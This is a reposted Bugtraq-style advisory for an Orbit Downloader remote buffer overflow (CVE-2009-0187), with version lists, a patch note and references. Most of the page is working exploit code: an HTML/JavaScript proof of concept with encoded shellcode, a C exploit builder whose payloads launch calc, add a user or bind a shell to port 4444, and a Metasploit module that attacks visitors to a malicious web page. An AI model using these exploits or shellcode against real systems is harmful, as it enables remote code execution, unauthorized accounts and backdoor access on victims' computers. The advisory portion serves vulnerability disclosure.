|
Feeds -
Exploits
|
|
Written by fl0 fl0w and Stefan Cornelius
|
|
Tuesday, 17 March 2009 21:49 |
Orbit Downloader 'Connecting' Log Message Creation Remote Buffer Overflow Vulnerability
-\\Bugtraq ID:
33894
-\\Class:
Boundary Condition Error
-\\CVE:
CVE-2009-0187
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Feb 03 2009 12:00AM
-\\Updated:
Mar 17 2009 04:16PM
-\\Credit:
fl0 fl0w and Stefan Cornelius
-\\Vulnerable:
Orbit Downloader Orbit Downloader 2.8.4
Orbit Downloader Orbit Downloader 2.8.3
Orbit Downloader Orbit Downloader 2.8.2
-\\Not Vulnerable:
Orbit Downloader Orbit Downloader 2.8.5
-\\Discussion
Orbit Downloader is prone to a remote buffer-overflow vulnerability because it fails to perform adequate
boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the
application. Failed exploit attempts will cause a denial-of-service condition.
This issue affects versions prior to Orbit Downloader 2.8.5.
-\\Exploit(s)/PoC(s):
A working commercial exploit is available through VUPEN Security - Exploit and PoCs Service. This exploit is
not otherwise publicly available or known to be circulating in the wild.
The following exploits are available:
===============================================================
33894.html
^^^^^^^^^^^
<html>
<body>
Orbit <=2.4 Long Hostname Buffer Overflow Vulnerability Poc<br />
Vulnerability discovered by Secunia<br />
Exploit and POC provided by: JavaGuru<br />
<br />
Right click on link below then choose download by orbit, CALC.EXE will pop up<br />
<br />
I got a lot of problems when trying to execute shellcode, because a lot of chars<br />
was forbidden and I was not able to execute shellcode.<br />
After playing a little I found out the solution.<br />
<br />
Don't forget, open this HTML in Firefox
<br />
Check it out.<br />
<br />
Any questions/comments:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
<br />
<br />
<script language="JavaScript">
var tmp = "http://";
for (i=0;i<508;i++) tmp +="%6F";
// jmp esp from kernel32.dll XP SP 3 English
//
tmp += "%7B%46%86%7C";
// some nops
tmp += "%90%90%90%90";
// win32_exec - EXITFUNC=process CMD=calc.exe Size=424 Encoder=Alpha2 http://metasploit.com
// forbidden chars - 0x00 0x01 0x02 0x03
tmp += "%eb%59%59%59%59%eb%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59
%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59
%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%e8%a4%ff%ff%ff%37%49%49%49%49%49%49%49%49%49%49%49%49%49%49
%49%49%49%51%5a%6a%67%58%50%30%42%31%41%42%6b%42%41%77%32%42%42%32%41%41%30%41%41%58%42%50%38%42%42%75%6d%39%49%6c
%4b%58%37%34%43%30%33%30%77%70%6e%6b%73%75%55%6c%6e%6b%61%6c%66%65%50%78%54%41%4a%4f%6c%4b%62%6f%56%78%4c%4b%51%4f
%45%70%55%51%7a%4b%31%59%6e%6b%36%54%4c%4b%53%31%6a%4e%45%61%4f%30%5a%39%4c%6c%6e%64%49%50%34%34%55%57%6a%61%4b%7a
%66%6d%35%51%6b%72%6a%4b%6c%34%55%6b%41%44%44%64%76%64%73%45%5a%45%4c%4b%73%6f%57%54%47%71%6a%4b%30%66%6c%4b%74%4c
%30%4b%6c%4b%53%6f%37%6c%47%71%5a%4b%6e%6b%77%6c%6c%4b%34%41%4a%4b%4b%39%51%4c%44%64%54%44%7a%63%37%41%4f%30%41%74
%6c%4b%43%70%76%50%4c%45%4f%30%30%78%66%6c%6c%4b%37%30%64%4c%6c%4b%30%70%65%4c%6c%6d%4c%4b%43%58%36%68%78%6b%75%59
%6e%6b%6f%70%4e%50%55%50%55%50%55%50%4e%6b%75%38%55%6c%43%6f%46%51%79%66%63%50%70%56%4c%49%6c%38%6b%33%6f%30%61%6b
%32%70%71%78%61%6e%6b%68%7a%42%43%43%71%78%5a%38%6b%4e%6d%5a%76%6e%70%57%69%6f%6d%37%72%43%55%31%30%6c%70%63%76%4e
%70%65%72%58%50%65%73%30%67";
// Filename (not important)
tmp += "/a.rar";
// Write link for download for orbit!
document.write ('<a href="' + tmp + '">Right click, then choose download with orbit</a>');
</script>
</body>
</html>
===============================================================
33894.c
^^^^^^^^
/*0day orbit_expl.c*/
/*Orbit Downloader V2.8.5 Malformed URL Buffer Overflow Exploit*/
/*Bug found by fl0 fl0w ,exploit programmed by fl0 fl0w*/
/*Click NEW and copy paste each line into the URL field.
Important copy paste one line at the time cause it wouln't allow you to copy more than 100 caracters at
once,so be patient.
***************************SPRAY THE STACK*****************************************************************
*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA *
*CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC *
*BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB *
*DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD *
*FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF *
*LVVBXUUXXGGGMMMMGGTGGJJJJJJGYGGEEEEEEGRGGGGGGGGGOGGGGGGGGGLGGGGGGGGGZGGGGGGGGGAGGGGGGGGGSGGGGGGGGGCC *
* 10 20 30 40 50 60 70 80 90 100 *
*TTTTXAAXTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT *
* |EIP| = 504 bytes offset *
* *
*URL STRUCTURE *
* http://www. + [604 * NOP(0X90)] + [NEW EIP(JMP ESP)] +[SHELLCODE] + [0X00(1 * NULL BYTE)] *
***********************************************************************************************************
EAX 00000001
ECX 46464646 ->overwriten
EDX 7C90E4F4 ntdll.KiFastSystemCallRet
EBX 00BD3AD0
ESP 0140F574 ASCII "XGGGMMMMGGTGGJJJJJJGYGGEEEEEEGRGGGGGGGGGOGGGGGGGGGLGGGGGGGGGZGGGGGGGGGAGGGGGGGGGSGGGGGGGGGCC:80"
EBP 00BD3AF0
ESI 00BD4020
EDI 00CC4360 download.00CC4360
EIP 58555558 ->overwriten
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#define SIZE 10000
#define OFFSET 504
void file (char * , char *);
void write (char *, int ,char *);
void print ();
void usage (char *);
void target ();
/*tnx Metasploit for Shellcodes*/
//LAUNCH CALC.EXE
char shellcode_1[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
"\x70\x63";
//ADD USER
char shellcode_2[ ]=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
//REVERSE CMD SHELL ->BIND PORT
char shellcode_3[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
struct {
char *OS;
unsigned int EIP;
}
Retcodes [] = { { "Microsoft Windows Pro sp3 English:", 0x7C8369F0 },/*call esp */
{ "Microsoft Windows Pro sp3 English:", 0x7C86467B }, /*jmp esp */
{ "\t\t\t UNIVERSAL_1:", 0x1008E153 },
{ "\t\t\t UNIVERSAL_2:", 0x219FB9B },
{ "Windows 2000 5.0.1.0 SP1 (IA32) English:", 0x69952208 }, /*jmp esp*/
{ "sss", 0x7C868667} ,
}, t;
int main(int argc, char *argv[])
{
int X, shell ;
char *L, *Z;
char *actbuff;
actbuff = (char *)malloc(SIZE);
if (argc < 3) {
system("cls");
printf("***********************************************************************\n");
print ();
usage (argv[0]);
Sleep(1000);
printf("\n\n");
printf("\t\t\t\tTargets\n");
target();
printf("************************************************************************\n");
exit (0);
}
L = argv[0];
Z = argv[1];
shell = atoi(argv[2]);
write (actbuff, shell, Z);
file (argv[3], actbuff);
print();
printf("Loading ...");
Sleep(3000);
printf ("File build succesfully\n");
return 0;
}
void target()
{
int i;
for (i = 0; i < sizeof(Retcodes)/sizeof(t); i++)
printf("> %d %s <0x%.8x> \n", i, Retcodes[i].OS, Retcodes[i].EIP);
}
void file (char *filename, char *buff)
{
FILE *f;
if ((f = fopen(filename, "wb")) == NULL) {
printf("Error writing file\n");
exit(0);
}
fwrite (buff, 1 , strlen(buff), f);
free (buff);
fclose (f);
}
void write (char *buffer, int shellc_type, char *Y)
{
unsigned int offset = 0;
unsigned int RET = Retcodes[atoi(Y)].EIP;
memset (buffer ,0x90, SIZE);
offset = OFFSET;
memcpy (buffer + offset, &RET, 4); offset += 4;
switch (shellc_type) {
case 1:
memcpy (buffer + offset ,shellcode_1, strlen(shellcode_1)); offset += strlen(shellcode_1);
memset (buffer + offset, 0x00, 1);
break;
case 2:
memcpy (buffer + offset ,shellcode_2, strlen(shellcode_2)); offset += strlen(shellcode_2);
memset (buffer + offset, 0x00, 1);
break;
case 3:
memcpy (buffer + offset ,shellcode_3, strlen(shellcode_3)); offset += strlen(shellcode_3);
memset (buffer + offset, 0x00, 1);
break;
}
}
void usage(char *K)
{
printf ("Usage is: %s [target] [shell_type] [filename].txt\n", K);
fputs (
"\t\tRetaddress for your version of Windows\n"
"\t\tShell_type is the type of shellcode you want to run\n"
"\t\t\t *Press 1 To Run CALC.EXE\n"
"\t\t\t *Press 2 To Add User\n"
"\t\t\t *Press 3 To Bind Shell to Port 4444\n"
"\t\tExample\n"
"\t\t\torbit_expl.exe 0 3 file.txt\n"
,stdout);
}
void print()
{
fputs(
"\t\tOrbit Downloader V2.8.5 Malformed URL Buffer Overflow Exploit\n"
"\t\tby fl0 fl0w\n"
"\t\tContact:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
\n"
"\n", stdout);
}
===============================================================
33894.rb
^^^^^^^^^
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Orbit Downloader Connecting Log Creation Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Orbit Downloader 2.8.4. When an
attacker serves up a malicious web site, abritrary code may be executed.
The PAYLOAD windows/shell_bind_tcp works best.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2009-0187' ],
[ 'BID', '33894' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 750,
'BadChars' => "\x00\x09\x0a\x0d'\\&",
'StackAdjustment' => -3500,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-SP2', { 'Ret' => 0x1008dee3 } ], # download.dll 2.7.0.6
],
'DisclosureDate' => 'Feb 3 2009',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Randomize some things
vname = rand_text_alpha(rand(100) + 1)
strname = rand_text_alpha(rand(100) + 1)
# Set the exploit buffer
sploit = "http://" + rand_text_alpha(508) + [target.ret].pack('V') + p.encoded + ".com"
# Build out the message
content = %Q|
<html>
<object classid='clsid:3F1D494B-0CEF-4468-96C9-386E2E4DEC90' id='#{vname}'></object>
<script language='javascript'>
var #{vname} = document.getElementById('#{vname}');
var #{strname} = new String('#{sploit}');
#{vname}.download(#{strname}, #{vname}, #{vname}, #{vname}, 1);
</script>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
-\\Solution
The vendor has released Orbit Downloader 2.8.5 to address this issue. Please see the references for more
information.
Orbit Downloader Orbit Downloader 2.8.2
--Orbit Downloader Orbit Downloader V2.8.5
http://www.orbitdownloader.com/download.hthttp://www.orbitdownloader.com/download.htm
Orbit Downloader Orbit Downloader 2.8.3
--Orbit Downloader Orbit Downloader V2.8.5
http://www.orbitdownloader.com/download.hthttp://www.orbitdownloader.com/download.htm
Orbit Downloader Orbit Downloader 2.8.4
--Orbit Downloader Orbit Downloader V2.8.5
http://www.orbitdownloader.com/download.hthttp://www.orbitdownloader.com/download.htm
-\\Reference(s)
--0day Orbit dw
http://aluigi.freeforums.org/0day-orbit-dw-t724.htm (floflow)
--Orbit Downloader Homepage
http://www.orbitdownloader.com/index.ht (Orbit Downloader)
--Secunia Research: Orbit Downloader Long URL Parsing Buffer Overflow
http://secunia.com/secunia_research/2009-9 (Secunia)
--Secunia Research: Orbit Downloader Long URL Parsing Buffer Overflow
http://www.securityfocus.com/archive/1/50122 (Secunia Research <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
|
|
